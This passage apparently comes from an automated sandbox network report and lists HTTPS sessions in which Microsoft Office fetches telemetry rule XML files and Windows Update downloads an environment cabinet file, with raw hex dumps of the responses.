                                                  2024-11-27 17:10:18 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 6e 64 46 6f 6e 74 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextAndFonts" S="Medium" /> <F T="2">


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  136192.168.2.64986013.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:10:19 UTC192OUTGET /rules/rule702201v1s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:10:19 UTC494INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:10:19 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1397
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:56 GMT
                                                  ETag: "0x8DC582BE7262739"
                                                  x-ms-request-id: dc0e935b-901e-005b-3791-3f2005000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T171019Z-174f7845968j6t2phC1EWRcfe80000000xd0000000009h2u
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:10:19 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTel


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  137192.168.2.64985913.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:10:19 UTC192OUTGET /rules/rule702200v1s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:10:19 UTC494INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:10:19 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1360
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                  ETag: "0x8DC582BDDEB5124"
                                                  x-ms-request-id: b189b901-c01e-0079-3391-3fe51a000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T171019Z-174f7845968g6hv8hC1EWR1v2n000000051g00000000ryc3
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:10:19 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 6c 4d 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTellMe" S="Medium" /> <F T="2">


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  138192.168.2.64986113.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:10:19 UTC192OUTGET /rules/rule700401v2s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:10:19 UTC494INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:10:19 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1403
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                  ETag: "0x8DC582BDCB4853F"
                                                  x-ms-request-id: 580008bf-301e-0000-1d8a-3feecc000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T171019Z-174f7845968xlwnmhC1EWR0sv80000000wzg00000000qn19
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:10:19 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 31 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700401" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  139192.168.2.64986313.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:10:20 UTC192OUTGET /rules/rule700351v1s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:10:20 UTC494INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:10:20 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1397
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                  ETag: "0x8DC582BDFD43C07"
                                                  x-ms-request-id: 850f9e76-101e-0028-7b6a-408f64000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T171020Z-174f7845968zgtf6hC1EWRqd8s0000000q7g00000000613q
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:10:20 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSys


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  140192.168.2.64986213.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:10:20 UTC192OUTGET /rules/rule700400v2s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:10:21 UTC494INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:10:20 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1366
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                  ETag: "0x8DC582BDB779FC3"
                                                  x-ms-request-id: fde36bdf-c01e-000b-1591-3fe255000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T171020Z-174f78459684bddphC1EWRbht40000000wzg00000000a09q
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:10:21 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 30 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 65 6d 65 74 72 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700400" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTelemetry" S="Medium" /> <F T="2


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  141192.168.2.64986420.109.210.53443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:10:21 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=yxKAAfE1arTmDDx&MD=11F9SbpG HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept: */*
                                                  User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                  Host: slscr.update.microsoft.com
                                                  2024-11-27 17:10:21 UTC560INHTTP/1.1 200 OK
                                                  Cache-Control: no-cache
                                                  Pragma: no-cache
                                                  Content-Type: application/octet-stream
                                                  Expires: -1
                                                  Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                  ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                  MS-CorrelationId: c98f2f10-abcf-432e-9738-26fbffada4e8
                                                  MS-RequestId: 2886af38-da8f-4d6e-a4e3-ea0eb5683f31
                                                  MS-CV: +fjzVh2G3UqqHIAd.0
                                                  X-Microsoft-SLSClientCache: 1440
                                                  Content-Disposition: attachment; filename=environment.cab
                                                  X-Content-Type-Options: nosniff
                                                  Date: Wed, 27 Nov 2024 17:10:21 GMT
                                                  Connection: close
                                                  Content-Length: 30005
                                                  2024-11-27 17:10:21 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                                  Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                                  2024-11-27 17:10:22 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                                  Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  142192.168.2.64986613.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:10:21 UTC192OUTGET /rules/rule703901v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:10:22 UTC494INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:10:21 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1427
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                  ETag: "0x8DC582BE56F6873"
                                                  x-ms-request-id: 572f8884-901e-002a-163e-407a27000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T171021Z-174f7845968cdxdrhC1EWRg0en0000000x90000000001ma1
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:10:22 UTC1427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703901" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexu


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  143192.168.2.64986513.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:10:21 UTC192OUTGET /rules/rule700350v1s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:10:22 UTC494INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:10:22 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1360
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                  ETag: "0x8DC582BDD74D2EC"
                                                  x-ms-request-id: 9b9719a8-201e-0033-3491-3fb167000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T171022Z-174f78459688l8rvhC1EWRtzr000000009q000000000v6qy
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:10:22 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 74 65 6d 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSystem" S="Medium" /> <F T="2">


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  144192.168.2.64986713.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:10:21 UTC192OUTGET /rules/rule703900v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:10:22 UTC494INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:10:22 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1390
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                                                  ETag: "0x8DC582BE3002601"
                                                  x-ms-request-id: abcfbd22-201e-005d-403e-40afb3000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T171022Z-174f7845968j6t2phC1EWRcfe80000000xbg00000000fzxa
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:10:22 UTC1390INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 53 3d
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703900" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenServiceabilityManager" S=


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  145192.168.2.64986813.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:10:22 UTC192OUTGET /rules/rule701501v1s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:10:23 UTC494INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:10:23 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1401
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:48 GMT
                                                  ETag: "0x8DC582BE2A9D541"
                                                  x-ms-request-id: 2150929f-401e-0064-4382-3f54af000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T171023Z-174f7845968kvnqxhC1EWRmf3g0000000g40000000002205
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:10:23 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53
